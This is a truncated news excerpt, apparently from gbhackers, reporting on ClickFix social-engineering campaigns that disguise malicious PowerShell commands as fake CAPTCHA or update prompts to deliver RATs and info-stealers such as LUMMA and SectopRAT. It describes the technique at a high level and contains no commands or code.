Cybercriminals Leverage ClickFix Strategy to Deploy RATs and Data-Stealing Malware
gbhackers
Cybercriminals are increasingly exploiting a deceptive social engineering technique known as ClickFix to initiate multi-stage cyberattacks, delivering remote access trojans (RATs) and data-stealing malware with alarming efficiency.
First identified in March 2024, ClickFix manipulates users into executing malicious PowerShell commands by disguising them as routine prompts like CAPTCHA verifications or browser updates.
Fake captcha
By leveraging human psychology and “verification fatigue,” attackers trick users into copying and pasting these commands into their system’s run dialog, bypassing traditional security measures.
Social Engineering as the Entry Point
Elastic Security Labs reports a significant surge in ClickFix campaigns throughout 2024 and into 2025, with a notable increase in activity during Q1 2025, targeting a wide range of victims with malware like LUMMA, ARECHCLIENT2 (also known as SectopRAT), and the GHOSTPULSE loader.
A recent ClickFix campaign analyzed by Elastic Security Labs reveals a meticulously crafted infection process.
The ...
Copyright of this story solely belongs to gbhackers . To see the full text click HERE